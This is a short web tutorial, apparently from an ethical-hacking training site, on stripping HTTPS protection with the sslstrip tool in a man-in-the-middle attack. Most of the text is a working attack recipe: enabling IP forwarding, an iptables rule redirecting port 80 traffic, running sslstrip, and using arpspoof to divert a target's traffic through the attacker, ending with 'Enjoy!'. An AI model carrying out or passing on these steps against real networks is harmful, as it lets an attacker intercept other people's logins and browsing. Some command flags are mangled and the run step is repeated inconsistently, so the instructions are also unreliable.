Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

How To Break SSL Protection via MITM Attack With SSLStrip Tool

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks. It requires Python 2.5 or newer, along with the ‘twisted’ python module.

First Requirements:

  • Run Python
  • The python “twisted-web” module (apt-get install python-twisted-web)

Setup

  •  Unpack: tar zxvf sslstrip-0.5.tar.gz
  •  Install twisted:  sudo apt-get install python-twisted

How to Run?

Flip your machine into forwarding mode.

echo “1” > /proc/sys/net/ipv4/ip_forward

Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

Run sslstrip.
sslstrip.py -l <listenPort>

Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

When ARPspoof start capturing traffic then SSL strip became success use the following command.
sslstrip -l 8080

Now type facebook.com or Google.com into your browser and open these websites without Https. It will be open http://google.com 😛

Enjoy!

Download SSLStrip